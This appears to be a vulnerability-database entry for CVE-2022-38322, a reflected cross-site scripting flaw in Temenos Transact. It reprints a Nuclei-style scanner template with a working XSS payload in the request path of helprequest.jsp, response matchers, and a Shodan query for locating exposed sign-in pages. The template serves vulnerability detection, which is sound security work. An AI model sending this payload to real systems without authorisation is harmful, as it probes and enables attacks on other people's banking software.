漏洞描述
Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks.
CVE-2022-38322: Temenos Transact - Cross-Site Scripting
PoC代码[已公开]
id: CVE-2022-38322
info:
name: Temenos Transact - Cross-Site Scripting
author: qotoz
severity: high
description: |
Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks.
reference:
- https://www.qotoz.com/posts/Temenos-Transact-XSS-CVE/
metadata:
verified: true
max-request: 1
shodan-query: http.title:"transact sign in","t24 sign in"
tags: cve,cve2022,temenos,transact,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"
matchers-condition: and
matchers:
- type: word
part: body
words:
- setupHelp('')" onerror="confirm('document.domain')
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 200
# digest: 490a00463044022044a928b1c5b76a54f8948d8d6487ab459238c1a7578661817e0537117165072f02205705e33889a92fd7fe57038a373ec7c5153974e4b8273a37c2b21a0ea60f9c0d:922c64590222798bb761d5b6d8e72950